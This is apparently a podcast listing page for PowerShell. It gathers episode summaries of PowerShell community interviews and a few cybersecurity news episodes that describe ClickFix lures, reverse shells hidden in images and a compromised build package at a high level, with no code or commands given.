Cross-platform command-line interface and scripting language for system and network administration
POPULARITY
Categories
Newly minted Microsoft MVP Stephen Valdinger, known as Steviecoaster, joins The PowerShell Podcast to share his journey from IT admin to community mentor and automation advocate. He talks about discovering PowerShell through Exchange, the career-changing power of automation, and his work with AutomatedLab, PowerShell Universal, and WinUI Shell. Stevie also highlights the importance of mentoring, building community, and making PowerShell approachable for everyone. Key Takeaways: PowerShell as a gateway: Learning PowerShell can unlock career growth, lead to better automation, and even spark new opportunities like blogging, mentoring, and conference speaking. Tools for learning and labs: AutomatedLab, paired with Stevie's utilities and GUI work, provides a powerful way to build test environments and gain hands-on experience. Community and mentorship matter: Sharing knowledge, mentoring beginners, and creating approachable tools not only help others grow but also strengthen your own skills. Guest Bio: Steven Valdinger (Steviecoaster) is a Microsoft MVP, Customer Success Manager at Chocolatey, and community leader with a passion for automation and mentoring. With years of experience in IT, Stevie has become known for his approachable teaching style, and his contributions to open source. He is also a frequent contributor to community discussions, blogs at steviecoaster.dev, and presents at events like PowerShell Wednesdays and PowerShell Summit. Resource Links: Steviecoaster's Blog: https://steviecoaster.dev Steviecoaster on BlueSky: https://bsky.app/profile/steviecoaster.dev Steviecoaster on GitHub: https://github.com/steviecoaster Connect with Andrew: https://andrewpla.tech/links Stevie's AutomatLab UI: https://github.com/steviecoaster/PowerShellUniversal.Apps.AutomatedLab AutomatedLab: https://github.com/AutomatedLab/AutomatedLab PowerShell Universal (by Ironman Software): https://ironmansoftware.com/powershell-universal WinUI Shell: https://github.com/mdgrs1/WinUI-Shell PDQ Discord: https://discord.gg/PDQ Stevie's PowerShell Wednesday WinUIShell talk: https://www.youtube.com/watch?v=PE1hy0VZXes&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B&index=5 The PowerShell Podcast on YouTube: https://youtu.be/iKYfZBakoBI The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast
CISA furloughs most of its workforce due to the government shutdown. The U.S. Air Force confirms it is investigating a SharePoint related breach. Google warns of a large-scale extortion campaign targeting executives. Researchers uncover Android spyware campaigns disguised as popular messaging apps. An extortion group claims to have breached Red Hat's private GitHub repositories. A software provider for recreational vehicle and power sport dealers suffers a ransomware breach. Patchwork APT deploys a new Powershell loader using scheduled tasks for persistence. A Tennessee Senator urges aggressive U.S. action to prepare for a post-quantum future. Cynthia Kaiser, SVP of Halcyon's Ransomware Research Center and former Deputy Assistant Director at the FBI's Cyber Division, joins us with insights on the government shutdown. A Malaysian man pleads guilty to supporting a massive crypto fraud. Protected health info is not a marketing tool. Remember to leave us a 5-star rating and review in your favorite podcast app. Miss an episode? Sign-up for our daily intelligence roundup, Daily Briefing, and you'll never miss a beat. And be sure to follow CyberWire Daily on LinkedIn. CyberWire Guest Cynthia Kaiser, SVP of Halcyon's Ransomware Research Center and former Deputy Assistant Director at the FBI's Cyber Division, joins us with insights on the government shutdown. Selected Reading Shutdown guts U.S. cybersecurity agency at perilous time (CISA) Air Force admits SharePoint privacy issue; reports of breach (The Register) Google warns executives are being targeted for extortion with leaked Oracle data (IT Pro) Researchers uncover spyware targeting messaging app users in the UAE (The Record) Red Hat confirms security incident after hackers claim GitHub breach (Bleeping Computer) 766,000 Impacted by Data Breach at Dealership Software Provider Motility (Security Week) Patchwork APT: Leveraging PowerShell to Create Scheduled Tasks and Deploy Final Payload (GB Hackers) GOP senator confirms pending White House quantum push, touts legislative alternatives (CyberScoop) Bitcoin Fixer Convicted for Role in Money Laundering Scheme (Bank Infosecurity) Nursing Home Fined $182K for Posting Patient Photos Online (Bank Infosecurity) Share your feedback. What do you think about CyberWire Daily? Please take a few minutes to share your thoughts with us by completing our brief listener survey. Thank you for helping us continue to improve our show. Want to hear your company in the show? You too can reach the most influential leaders and operators in the industry. Here's our media kit. Contact us at cyberwire@n2k.com to request more info. The CyberWire is a production of N2K Networks, your source for strategic workforce intelligence. © N2K Networks, Inc. Learn more about your ad choices. Visit megaphone.fm/adchoices
Thomas Rayner joins The PowerShell Podcast to share his journey from sysadmin and PowerShell MVP to securing Microsoft 365 as a security professional at Microsoft. He reflects on how PowerShell accelerated his career, the importance of blogging and community involvement, and why clear communication with managers is vital for growth. Thomas also offers advice for beginners, highlighting patience, persistence, and the value of mentorship in tech. Key Takeaways: PowerShell as a force multiplier: Automating repetitive tasks with PowerShell helped Thomas advance his career and opened the door to opportunities at Microsoft. Career growth requires communication: Being candid with managers, demonstrating value, and asking for resources to learn are key to advancement. Community and mentorship matter: Involvement in the PowerShell community, saying yes to opportunities, and supporting peers can transform both careers and personal growth. Guest Bio: Thomas Rayner is a security professional at Microsoft, where he focuses on preventative security solutions in Microsoft 365. A former Microsoft MVP in Cloud and Datacenter Management, Thomas built his career by blogging, speaking, and contributing to the PowerShell community. Originally from Edmonton, Canada, he used PowerShell to accelerate his early career as a sysadmin before moving into security roles at Microsoft. Today, he continues to share career wisdom, mentor others, and advocate for growth mindset thinking in tech. Resource Links: Thomas Rayner's Blog: https://thomasrayner.ca Thomas Rayner on LinkedIn: https://www.linkedin.com/in/thomasrayner/ Thomas Rayner on GitHub: https://github.com/tlrayner Connect with Andrew: https://andrewpla.tech/links PDQ Discord: https://discord.gg/PDQ The PowerShell Podcast on YouTube: https://youtu.be/3H-tMKqlSOs The PowerShell Podcast hub page: The PowerShell Podcast: https://pdq.com/the-powershell-podcast
Got a question or comment? Message us here!In this episode of The #SOCBrief, we break down the rising FileFix attack, a new social engineering technique using steganography to deliver info-stealing malware. Learn how attackers disguise malicious PowerShell commands, the risks this poses for browsers, messengers, and crypto wallets, and the proactive defenses SOCs can use to detect and contain these threats before they escalate into larger breaches.Support the showWatch full episodes at youtube.com/@aliascybersecurity.Listen on Apple Podcasts, Spotify and anywhere you get your podcasts.
Patrick Meinecke, known as SeeminglyScience, joins host Andrew Pla to share his journey from sysadmin to joining the PowerShell team at Microsoft. He discusses his early community contributions, the inner workings of the PowerShell engine, and powerful but underused features like ETS and type converters. Patrick also highlights helpful modules such as PowerShell Run, ctypes, and Useful Argument Completers, while reflecting on the importance of community engagement and open source collaboration. Key Takeaways: From community to Microsoft: Patrick's contributions to PowerShell Editor Services and GitHub repos helped pave the way for his role on the official PowerShell team. Hidden gems in PowerShell: Features like the Extendable Type System (ETS), type converters, and modules such as PowerShell Run, ctypes, and Useful Argument Completers unlock powerful possibilities. Community makes it stronger: Helping others, answering questions, and sharing knowledge not only grows the ecosystem but also helps contributors sharpen their own skills. Guest Bio: Patrick Meinecke, widely known as SeeminglyScience, is a software engineer on the PowerShell team at Microsoft. Before joining the team, he spent over 15 years in sysadmin and tech support roles and is a longstanding contributor to the PowerShell open-source community. Patrick is recognized for his deep technical expertise in the PowerShell engine, his contributions to PowerShell Editor Services, and his passion for solving complex problems. He remains an active community member, often engaging on Discord and GitHub to help others learn and grow. Resource Links: Patrick Meinecke on GitHub (@SeeminglyScience): https://github.com/SeeminglyScience Connect with Andrew: https://andrewpla.tech/links PowerShell Run (module by MDGRS): https://github.com/nbgrs/PowerShellRun Useful Argument Completers (module by MartinGC94): https://github.com/MartinGC94/UsefulArgumentCompleters ctypes (module by Jordan Borean): https://github.com/jborean93/PSctypes Spectre.Console for PowerShell (community project): https://github.com/PoshCode/PSSpectreConsole Join the PDQ Discord: https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/Zyj1IdZFf1E The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
Today we are joined by Nati Tal, Head of Guardio Labs, discussing their work “CAPTCHAgeddon” or unmasking the viral evolution of the ClickFix browser-based threat. CAPTCHAgeddon — Shaked Chen's deep dive into the ClickFix fake-captcha wave — reveals how a red-team trick morphed into a dominant, download-free browser threat that tricks users into pasting clipboard PowerShell/shell commands and leverages trusted infrastructure, including Google Scripts. Guardio's DBSCAN-based payload clustering exposes distinct attacker toolkits and distribution paths — from malvertising and compromised WordPress to social posts and Git repos — and argues defenders need behavioral, intelligence-driven protections, not just signatures. The research can be found here: “CAPTCHAgeddon” Unmasking the Viral Evolution of the ClickFix Browser-Based Threat Learn more about your ad choices. Visit megaphone.fm/adchoices
Today we are joined by Nati Tal, Head of Guardio Labs, discussing their work “CAPTCHAgeddon” or unmasking the viral evolution of the ClickFix browser-based threat. CAPTCHAgeddon — Shaked Chen's deep dive into the ClickFix fake-captcha wave — reveals how a red-team trick morphed into a dominant, download-free browser threat that tricks users into pasting clipboard PowerShell/shell commands and leverages trusted infrastructure, including Google Scripts. Guardio's DBSCAN-based payload clustering exposes distinct attacker toolkits and distribution paths — from malvertising and compromised WordPress to social posts and Git repos — and argues defenders need behavioral, intelligence-driven protections, not just signatures. The research can be found here: “CAPTCHAgeddon” Unmasking the Viral Evolution of the ClickFix Browser-Based Threat Learn more about your ad choices. Visit megaphone.fm/adchoices
Michael Niehaus, an IT and software development veteran with quite a long history at Microsoft, talks about his career from his early days as a mainframe system programmer to his deep involvement with Microsoft products. He describes how he moved from programming in assembly language to IT roles involving client-server models in the early days of personal computing in the 1990s. This ultimately led to his work with Microsoft's Systems Management Server (SMS) and the Business Desktop Deployment Solution Accelerator, the latter of which evolved into the Microsoft Deployment Toolkit (MDT). A significant focus of this episode is the development and evolution of deployment tools and the underlying techniques, from Kickstart to VBScript to PowerShell. Michael recalls encountering PowerShell and emphasises its potential as a powerful backend for various Microsoft products in the very early days. As strange as it may sound today, the release of Vista retrospectively represented a 'giant leap' in terms of new tools, techniques and enhancements, especially for OS deployment. Michael discusses the introduction of WIM files, WinPE and AutoUnattend.xml, among other things. He reflects on the challenges and innovations involved in shifting to WIM files, and on the effectiveness of Windows PE. He highlights their significance in Microsoft's operating system deployment strategies. Turning to contemporary issues, Michael and Thorsten discuss concerns about Microsoft's Windows Update Service (WSUS) and the impending discontinuation of related technologies. Finally, Michael talks about his role at the new company 2Pint, where he works on products such as DeployR, a successor to MDT.
In this episode, host Andrew Pla welcomes back Steven Judd, Microsoft MVP, teacher, and longtime community contributor. Together, they dive into the theme of beginnings, from starting careers in IT, to first encounters with PowerShell, and the importance of resilience while navigating the “valley of despair” in learning. Steven shares his journey from music and business studies into technology, where curiosity, persistence, and a willingness to read the manuals shaped his career. The conversation also explores how community, conferences, and friendships have been essential to Steven's growth. From humorous “please clap” moments at Nano Conf to building lasting connections, Steven highlights the power of showing up authentically, persevering through challenges, and helping others along the way.Key Takeaways The Power of the Basics: Learning commands like Get-Command, Get-Help, and Get-Member (“the tripod”) forms the foundation of a strong PowerShell journey. Resilience in Learning: Navigating the “valley of despair” in tough topics like PowerShell, certificates, or regex is where growth happens. Persistence pays off. Community is Everything: From user groups to conferences, surrounding yourself with peers and mentors accelerates growth and helps combat imposter syndrome. Guest Bio Steven Judd is a Microsoft MVP, educator, and veteran PowerShell enthusiast who has been teaching and sharing knowledge in the community for many years. With a background that spans business, music, and IT, Steven brings a unique perspective on learning, resilience, and humor. Known for his approachable teaching style and dad jokes, Steven has helped countless professionals embrace automation, improve their skills, and find their place in the PowerShell community.Resource Links Steven Judd's Content Hub: https://shortcutyour.life Steven Judd on YouTube (PowerShell content): YouTube Search Steven Judd on X/Twitter (@StevenJudd): https://x.com/StevenJudd Steven Judd's Merch Store: https://store.stephenjudd.com PDQ Discord: https://discord.gg/PDQ Connect with Andrew: https://andrewpla.tech/links PowerShell Wednesdays (live community sessions): https://www.youtube.com/watch?v=8oesn0HgGxE&list=PL1mL90yFExsix-L0havb8SbZXoYRPol0B The PowerShell Podcast on YouTube: https://youtu.be/yu6RVPwp8KY The PowerShell Podcast hub: The PowerShell Podcast: https://pdq.com/the-powershell-podcast
HP Wolf Security research shows attackers chaining living-off-the-land techniques to exploit detection weak spots HP Inc has issued its latest Threat Insights Report, revealing how age-old living-off-the-land (LOTL) and phishing techniques are evolving to bypass traditional detection-based security tools. LOTL techniques - where attackers use legitimate tools and features built into a computer to carry out their attacks - have long been a staple of the threat actor toolkit. However, HP Threat Researchers now warn that the growing use of multiple, often uncommon, binaries in a single campaign is making it even harder to distinguish malicious versus legitimate activity. The report provides an analysis of real-world cyberattacks, helping organisations to keep up with the latest techniques cybercriminals are using to evade detection and breach PCs in the fast-changing cybercrime landscape. Based on the millions of endpoints running HP Wolf Security1, notable campaigns identified by HP Threats Researchers include: · Fake Adobe Reader Invoice Signals New Wave of Ultra-Polished Social Engineering Lures: Attackers embedded a reverse shell - a script that grants attackers control over a victim's device. The script was embedded in a small SVG image, disguised as a very realistic Adobe Acrobat Reader file, complete with a fake loading bar - giving the illusion of an ongoing upload, increasing the chances victims will open it and trigger an infection chain. Attackers also geofenced the download to German-speaking regions to limit exposure, hinder automated analysis systems and delay detection. · Attackers Hiding Malware in Pixel Image Files: Attackers used Microsoft Compiled HTML Help files to hide malicious code within image pixels. The files, disguised as project documents, concealed an XWorm payload in the pixel data, which was then extracted and used to execute a multi-step infection chain involving multiple LOTL techniques. PowerShell was also used to run a CMD file that deleted evidence of files once they'd been downloaded and executed. · Resurgent Lumma Stealer Spreads via IMG Archives: Lumma Stealer was one of the most active malware families observed in Q2. Attackers distributed it through multiple channels, including IMG Archive attachments that use LOTL techniques to bypass security filters and exploit trusted systems. Despite a law enforcement crackdown in May 2025, campaigns continued in June and that the group is already registering more domains and building infrastructure. Alex Holland, Principal Threat Researcher, HP Security Lab, comments:?"Attackers aren't reinventing the wheel, but they are refining their techniques. Living-off-the-land, reverse shells, and phishing have been around for decades, but today's threat actors are sharpening these methods. We're seeing more chaining of living-off-the-land tools and use of less obvious file types, such as images, to evade detection. Take reverse shells as an example - you don't have to drop a fully-fledged RAT when a simple, lightweight script will achieve the same effect. It's simple, fast and often slips under the radar because it's so basic." These campaigns show how creative and adaptive threat actors have become. By hiding malicious code in images, abusing trusted system tools, and even tailoring attacks to specific regions, they're making it harder for traditional detection tools to spot threats. By isolating threats that have evaded detection tools on PCs - but still allowing malware to detonate safely inside secure containers - HP Wolf Security has specific insight into the latest techniques used by cybercriminals. To date, HP Wolf Security customers have clicked on over 55 billion email attachments, web pages, and downloaded files with no reported breaches. The report, which examines data from April-June 2025, details how cybercriminals continue to diversify attack methods to bypass security tools that rely on detection, such as: · At least 13% of email threats ide...
I remember working at a large organization with a team of other IT Operations staffers. We rotated this one job every month amongst a few people, each taking turns, where we'd lose a day to update all the privileged passwords for our servers. This was before Managed Service Accounts and the cloud, when we were required to change these every 30 days and then store the new ones in an encrypted store. What struck me when I got stuck with this wasn't the requirement to change every 30 days; that seemed normal. The thing that bothered me was how manual this was. As a former developer, I wrote some scripts to automated this, pre-PowerShell, and make the task easier on my fellow sys admins. I had scripts to generate a password, change it in AD, then print the pwd to be copied into our secure storage (no API there). This ran in a loop so I didn't lose a whole day to changing password. Read the rest of Password Guidance
Microsoft MVP Emanuel Palm joins The PowerShell Podcast to share his journey from managing printers in Sweden to being a Microsoft MVP who is automating the cloud with PowerShell and Azure. He talks about building the AZAuth module for OAuth authentication, using GitHub Actions for CI/CD, and the importance of blogging and community involvement. Plus, Emanuel reveals his unique side hobby... roasting coffee! Key Takeaways From printers to the cloud: Emanuel's career shows how PowerShell can open doors, from automating IT tasks to driving cloud automation and DevOps practices. Community and sharing matter: Blogging, presenting, and contributing help you grow your own understanding while creating opportunities for others. Automation and authentication: With tools like GitHub Actions and his AZAuth module, Emanuel demonstrates how to simplify workflows and securely interact with APIs. Guest Bio Emanuel Palm is a Microsoft MVP based in Sweden, where he is a consultant focused on Microsoft technologies and is active in the PowerShell community. Emanuel is the creator of the AZAuth module, a lightweight solution for handling OAuth authentication in PowerShell, and a frequent speaker at events like PowerShell Conference Europe. Beyond tech, Emanuel is a coffee enthusiast who even roasts his own beans as a side hobby. Resource Links Emanuel's Blog: https://pipe.how GitHub – Emanuel Palm: https://github.com/palmemanuel X / BlueSky: @palmemanuel AZAuth Module on GitHub: https://github.com/PalmEmanuel/AzAuth Emanuel's PS Wednesday: https://www.youtube.com/watch?v=trP2LLDynA0 Arkanum Coffee (Emanuel's hobby project): https://arkanum.coffee PDQ Discord: https://discord.gg/pdq Connect with Andrew: https://andrewpla.tech/links The PowerShell Podcast on YouTube: https://youtu.be/-uHHGVH1Kcc The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
(Disclaimer: erstellt mit Copilot)Hallo liebe Community! In dieser Episode sprechen Michael & Thorsten über die neuesten Entwicklungen rund um Microsoft Copilot, die Integration von GPT-5, Single Sign-On auf dem Mac und ein paar typische „Moments of Luck“ aus dem Teams-Universum. Dazu gibt's einen Ausblick auf die M365 Summit und neue Community-Events.
James Brundage returns to The PowerShell Podcast to talk about his new project, Turtle, which brings the classic concept of Turtle graphics into PowerShell. From simple shapes to fractals, animations, and more, James shows how PowerShell can be a powerful and fun tool for exploring programming concepts. Tune in for insights on the history of Turtle, its modern applications, and how it can inspire both new learners and seasoned pros. Guest Bio: James Brundage is a Microsoft MVP who has been heavily involved in PowerShell for over 18 years. He is a former member of the PowerShell team, working there during v2 and v3. He now works as a consultant with Start-Automating, applying his PowerShell expertise to organizations to help solve large-scale problems all around the world. He also has a lot of great projects on GitHub and regularly shares his knowledge at user groups and conferences. Resource Links: PSTurtle Project & Documentation: https://psturtle.com/ GitHub – Start-Automating: https://github.com/StartAutomating James Brundage on BlueSky (@MrPowerShell): https://bsky.app/profile/mrpowershell.com MrPowerShell.com: https://mrpowershell.com/ PowerShell Web Organization (for PowerShell + Web projects): https://github.com/PowerShellWeb Turtles in PowerShell talk: https://www.youtube.com/watch?v=o8l_bQRvMkg Follow Andrew: https://andrewpla.tech/links Join the PDQ Discord: https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/oGG6bKXsdrg The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
Maxime Lamothe-Brassard, Founder and CEO of LimaCharlie, and the Defender Fridays community sit down with Jared Atkinson and dive into BloodHound.Jared is a security researcher who specializes in Digital Forensics and Incident Response. Recently, he has been building and leading private sector Hunt Operations capabilities. In his previous life, Jared lead incident response missions for the U.S. Air Force Hunt Team, detecting and removing Advanced Persistent Threats on Air Force and DoD networks. Passionate about PowerShell and the open source community, Jared is the lead developer of PowerForensics, Uproot, and maintains a DFIR focused blog at www.invoke-ir.com.On Defender Fridays we delve into the dynamic world of information security, exploring its defensive side with seasoned professionals from across the industry. Our aim is simple yet ambitious: to foster a collaborative space where ideas flow freely, experiences are shared, and knowledge expands.Join the live discussions by registering at https://limacharlie.io/defender-fridays
SANS Internet Stormcenter Daily Network/Cyber Security and Information Security Stormcast
Interesting Technique to Launch a Shellcode Xavier came across malware that PowerShell and the CallWindowProcA() API to launch code. https://isc.sans.edu/diary/Interesting%20Technique%20to%20Launch%20a%20Shellcode/32238 NX Compromised to Steal Wallets and Credentials The popular open source NX build package was compromised. Code was added that uses the help of AI tools like Claude and Gemini to steal credentials from affected systems https://semgrep.dev/blog/2025/security-alert-nx-compromised-to-steal-wallets-and-credentials/ Countering Chinese State-Sponsored Actors Compromise of Networks Worldwide to Feed the Global Espionage System Several law enforcement and cybersecurity agencies worldwide collaborated to release a detailed report on the recent Volt Typhoon incident. https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-239a
In this episode of the PowerShell Podcast, we're live from TechMentor at the Microsoft campus with two incredible guests: longtime advocate, educator, and PM on the PowerShell team at Microsoft - Jason Helmick and newcomer Troy Brown. This special episode captures the heart of community, innovation, and the transformative power of PowerShell—from seasoned insight to beginner breakthroughs. Jason drops serious knowledge on two game-changing technologies: AI Shell: Think ChatGPT, but built directly into your terminal. Learn how it enhances shell UX, assists with command building, explains parameters, and keeps you focused without switching contexts. DSC v3 (Desired State Configuration): Now fully cross-platform and decoupled from PowerShell, DSC v3 is lighter, more extensible, and suitable for everything from servers to IoT. Jason walks us through the evolution, real-world use cases (like flipping Windows from dark mode to light mode!), and what's next for the configuration platform. Highlights: Microsoft's hidden campus lore, including a piece of the Berlin Wall! The evolution of PowerShell ReadLine and its impact on productivity AI Shell's support for OpenAI, Azure Copilot, ollama, Gemini, and even custom agents Exporting configs from existing machines—a long-awaited DSC feature Why DSC v3 might be the most developer- and sysadmin-friendly release yet The cultural backbone of the PowerShell team: being “scrappy” and driven by customer success Troy Brown's First TechMentor Experience First-time conference-goer Troy Brown shares his experience diving into PowerShell: How a PowerShell workshop with Sean Wheeler, Steven Judd, and Jason Helmick helped him finally understand modules The journey from using PDQ to push basic PowerShell scripts to deeper automation potential Navigating the learning curve with community support His message to fellow newcomers: “Don't take things personally, and embrace the journey.” Resource Links: DSC v3 on GitHub Leanpub DSC v3 Book by Gijs https://leanpub.com/thedscv3handbook The Phoenix Project (book) (a must-read for IT pros) https://www.amazon.com/Phoenix-Project-DevOps-Helping-Business/dp/0988262592 https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/_f5oYxzkinI The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast
In this episode, Andrew catches up with Sean Wheeler and James Petty live from TechMentor. What starts as casual conversation about conference camaraderie turns into a rich discussion on learning PowerShell, building effective profiles, AI-assisted scripting, module recommendations, and what's next for the PowerShell Summit. Whether you're new to PowerShell or a seasoned scripter, this episode offers insights, laughs, and actionable advice. Plus, we finally settle (sort of) whether the VS Code sidebar belongs on the left or the right. Key Takeaways You don't need to learn everything. Just understand the ecosystem and build your learning map. Create your PowerShell profile now—it's an easy win with huge productivity returns. AI is a tool, not a crutch. Use it wisely and validate the results. Get involved in the community. It will accelerate your learning and broaden your opportunities. Shoutouts & Links https://powershell.org https://www.youtube.com/c/PowerShellOrg https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/hr59kahksIM
Are you tapping the power of Microsoft Graph? Richard chats with Tony Redmond about his work teaching people to leverage Microsoft Graph and all the insights it can provide about their organization. Tony views Graph as one of the key skills a sysadmin needs to manage an M365 tenant, alongside Exchange Online, SharePoint, and Teams. Throw in some Entra ID skills with Graph and you're ready to take on the rest - and there's a lot! Tony is also responsible for the excellent Office 365 for IT Pros book, now in its 12th edition for 2026. These are the fundamentals that can help you embrace the Copilot future we're all facing - and there's a lot to learn!LinksGraph PowerShell SDKAzure AutomationOffice 365 for IT Pros 2026 EditionMaesterAgent Governance in M365Secure Future InitiativeLinkable Identifiers in Microsoft EntraRecorded July 24, 2025
Eric and Bob cover Raspberry Pi, Hackathon and the ARM Powershell prizes for Explore
In this high-energy episode, returning guests Gilbert Sanchez and Jake Hildreth join Andrew for a deep dive into: Module templating with PSStucco Building for accessibility in PowerShell Creating open source GitHub orgs like PSInclusive How PowerShell can lead to learning modern dev workflows like GitHub Actions and CI/CD What begins with a conversation about a live demo gone hilariously sideways turns into an insightful exploration of how PowerShell acts as a launchpad into bigger ecosystems like GitHub, YAML, JSON, and continuous integration pipelines.Bios & Bios: Gilbert Sanchez is a Staff Software Development Engineer at Tesla, specifically working on PowerShell. Formerly known as "Señor Systems Engineer" at Meta. A loud advocate for DEI, DevEx, DevOps, and TDD. Jake Hildreth is a Principal Security Consultant at Semperis, Microsoft MVP, and longtime builder of tools that make identity security suck a little less. With nearly 25 years in IT (and the battle scars to prove it), he specializes in helping orgs secure Active Directory and survive the baroque disaster that is Active Directory Certificate Services. He's the creator of Locksmith, BlueTuxedo, and PowerPUG!, open-source tools built to make life easier for overworked identity admins. When he's not untangling Kerberos or wrangling DNS, he's usually hanging out with his favorite people and most grounding reality check: his wife and daughter. Links https://gilbertsanchez.com/posts/stucco-create-powershell-module/ https://jakehildreth.github.io/blog/2025/07/02/PowerShell-Module-Scaffolding-with-PSStucco.html https://github.com/PSInclusive https://jakehildreth.com/ https://andrewpla.tech/links https://discord.gg/pdq https://pdq.com/podcast https://youtu.be/w-z2-0ii96Y
In this episode of the PowerShell Podcast, host Andrew Pla reunites with PowerShell legend Fred, diving deep into productivity with hotkeys and key bindings, EntraAuth, C# integration, and community reflections from PowerShell Conference EU. Fred shares practical advice for improving your daily workflow, how to extend PowerShell with C#, and why participation in the community—whether through conferences or contributing modules—can be a game-changer for your career. What You'll Learn: How to improve your coding efficiency with advanced hotkeys and key bindings The difference between hotkeys and key bindings and how to create your own Insights into Fred's EntraAuth module and why federated credentials matter When it makes sense to use C# alongside PowerShell How community involvement can elevate your career What makes PowerShell Conference EU a unique experience Tips for new speakers interested in submitting conference talks Bio & Links: Fred Weinmann is a seasoned Cloud Solution Architect at Microsoft and a renowned PowerShell expert with years of experience designing and implementing scalable solutions. A prolific creator, Fred has developed key tools like PSFramework, PSModuleDevelopment, PSUtil, and PSFramework.Nuget, which empowers developers and IT professionals to optimize their workflows. Passionate about technology and problem-solving, Fred's innovative approach to PowerShell module development and his commitment to community-driven open-source projects have made him a respected figure in the PowerShell community. https://github.com/FriedrichWeinmann/EntraAuth https://github.com/PowershellFrameworkCollective/PSFramework.NuGet https://github.com/FriedrichWeinmann/string https://andrewpla.tech/links https://psconf.eu https://github.com/PowershellFrameworkCollective/psframework Fred's PSConfEU PSFramework.Nuget talk: https://www.youtube.com/watch?v=iMSOVwmBXrk Check out PDQ Connect https://pdq.com/podcast Join the PowerShell Scripting channel: https://discord.gg/pdq The PowerShell Podcast on YouTube: https://youtu.be/TZPy4X6yLjM The PowerShell Podcast hub: https://pdq.com/the-powershell-podcast
How do you get from ClickOps to DevOps? While at Build, Richard chatted with Steven Bucher about using Copilot in Azure to help build PowerShell scripts with Azure CLI to get you moving down the path of repeatable deployment. Steven talks about interacting with Copilot in Azure through the Portal, Azure CLI, and PowerShell. Using tools like GitHub Copilot in Visual Studio Code can help you start making Infrastructure as Code in Bicep or Terraform to move you along the path of automating reliable deployments!LinksCopilot in AzureAzure CLITerraformAI ShellPowerShell 7.5BicepGitHub Copilot on VS CodeRecorded May 19, 2025
In this insightful episode of the PowerShell Podcast, host Andrew Pla welcomes longtime friend and seasoned technologist Ryan Coates. Together, they explore the intersection of PowerShell and C#, discuss the natural evolution of tech careers, and examine the role of continuous learning in long-term success. Ryan shares a wealth of perspective from decades in IT—covering everything from early networking to modern cloud architectures and why C# is a practical next step for PowerShell users. Whether you're deep in automation or eyeing your next language leap, this conversation is packed with career wisdom, developer philosophy, and some solid tech nostalgia. What You'll Learn: Why C# is a great next step for experienced PowerShell users Use cases where C# offers performance or capability advantages over PowerShell How PowerShell and C# skills complement each other in the .NET ecosystem Ryan's journey from MCSE teen prodigy to early retirement Why soft skills are just as vital as technical skills for senior roles The value of working across many technologies and industries early in your career Insights into DevOps maturity, architecture thinking, and lifelong learning Bio & Links: Ryan Coates is an Enterprise Architect with 25+ years in IT, evolving from systems ops to DevOps and developer advocacy. He leads internal API and DevRel strategy at a global consulting firm. Passionate about mentoring, Ryan speaks at conferences on cloud and automation and helps run Microsoft Cloud, DevOps, and PowerShell user groups in Boise, Idaho. https://linkedin.com/in/ryandcoates https://twitter.com/ryandcoates https://discord.gg/pdq https://andrewpla.tech/links Ryan's C# Talk at PS Wednesday: https://www.youtube.com/watch?v=hOaFdHTlDXE Ryan's Summit Talk: https://www.youtube.com/watch?v=AePjFyuWvg8 Join the PowerShell Scripting Channel on PDQ Discord: https://discord.gg/pdq Check out PDQ Connect: https://pdq.com/podcast The PowerShell Podcast on YouTube: https://youtu.be/72UCneA1X40 The PowerShell Podcast Hub: https://pdq.com/the-powershell-podcast
In this episode of the PowerShell Podcast, Andrew Pla welcomes longtime friend and DevOps Endpoint Engineer David Richmond. Fresh off his PowerShell Wednesday presentation, David shares insights into the power of splatting in PowerShell, centralizing automations, and driving organizational change through best practices and leadership. The conversation explores the evolution of automation practices, Git adoption in Ops, secrets management using Azure Key Vault, and how empowering others can multiply technical impact. It's an inspiring blend of deep PowerShell knowledge and practical career development advice. What You'll Learn: What splatting is in PowerShell and why it's such a powerful coding practice How to organize, simplify, and clean up your scripts with hash tables and ordered dictionaries David's journey from solo IT support to leading centralized automation efforts Pro tips on Git, module development, credential management, and code organization The benefits of creating training sessions and fostering a team-wide PowerShell culture Why data-driven automation metrics can win leadership support How PowerShell can scale your impact and accelerate your career Bio & Links: David Richmond started writing scripts in the Macintosh OS days (the 90s!) and hasn't stopped. Currently working in the every-OS endpoint engineering / devops space, particularly focused on internal automations team skillups in PowerShell and beyond. https://discord.gg/pdq https://www.linkedin.com/in/david-s-richmond/ https://dev.to/celadin https://bsky.app/profile/davidsrichmond.com Splatting PowerShell Wednesday: https://www.youtube.com/watch?v=8oesn0HgGxE https://github.com/PoshCode/PowerShellPracticeAndStyle The PowerShell Podcast Hub: The PowerShell Podcast: https://pdq.com/the-powershell-podcast The PowerShell Podcast on YouTube: https://youtu.be/_cbpGxZOHS4 Help topic: help about_splatting
Bart had an itch to scratch, and he decided to scratch it with PowerShell. You'll remember that he gave us a teaser Tidbit seven months ago in Tidbit 11, and we still haven't started learning PowerShell so this one is yet another teaser. The itch he had was trying to understand the "Monty Hall Problem" [en.wikipedia.org/...](https://en.wikipedia.org/wiki/Monty_Hall_problem), and by writing a script to simulate a thousand rounds of the game, he was able to finally understand the solution. It is great fun hearing Bart describe how he spent the first few days of his annual leave programming ... because it was fun! You can find Bart's fabulous tutorial shownotes and the audio podcast at pbs.bartificer.net. Read an unedited, auto-generated transcript with chapter marks: PBS_2025_07_19 Join our Slack at podfeet.com/slack and check out the Programming By Stealth channel under #pbs. Support Bart by going to lets-talk.ie and pushing one of the big blue support buttons. Referral Links: Setapp - 1 month free for you and me Parallels Toolbox - 3 months free for you and me Learn through MacSparky Field Guides - 15% off for you and me Backblaze - One free month for me and you Eufy - $40 for me if you spend $200. Sadly nothing in it for you. PIA VPN - One month added to Paid Accounts for both of us CleanShot X - Earns me $25%, sorry nothing in it for you but my gratitude
